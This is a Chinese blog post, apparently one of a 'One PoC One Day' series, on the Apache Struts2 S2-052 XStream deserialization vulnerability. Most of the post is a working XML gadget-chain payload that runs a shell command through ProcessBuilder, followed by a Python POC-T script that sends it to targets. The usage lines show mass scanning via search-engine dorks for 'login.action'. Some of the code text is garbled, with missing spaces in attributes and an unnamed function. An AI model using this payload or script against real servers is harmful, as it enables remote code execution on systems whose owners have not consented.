# 0x01
One Poc One Day —— Struts2 052
# 0x02
## 原理
Struts2 REST 插件使用带有 XStream 程序的 XStream Handler 进行未经任何代码过滤的反序列化操作,这可能在反序列化XML payloads时导致远程代码执行。任意攻击者都可以构造恶意的XML内容提升权限。
## Payload
1
|
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><cipherclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="javax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceIterator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>
|
## Poc
em……一切为了配合POC-T,多多适配Poc,多多积累自己的script。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
|
""" Struts2 S2-052 影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12
Usage: python POC-T.py -s struts2-s2052 -aG "inurl:login.action" --gproxy "http 127.0.0.1 1080" python POC-T.py -s struts2-s2052 -aZ "login.action" python POC-T.py -s struts2-s2052 -iF FILE.txt """
import requests
def (url): if '://' not in url: url = 'http://' + url try: header = dict() header['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" header['Content-Type'] = "application/xml" header['Connection'] = "close" header['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" payload = '''<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><cipherclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="javax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceIterator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>''' response_data = requests.post(url, data=payload, headers=header) if response_data.status_code == 500 or r"java.security.Provider$Service" in response_data.text: return '[s2-052]' + url else: return response_data.text
except Exception: return False
|
近期评论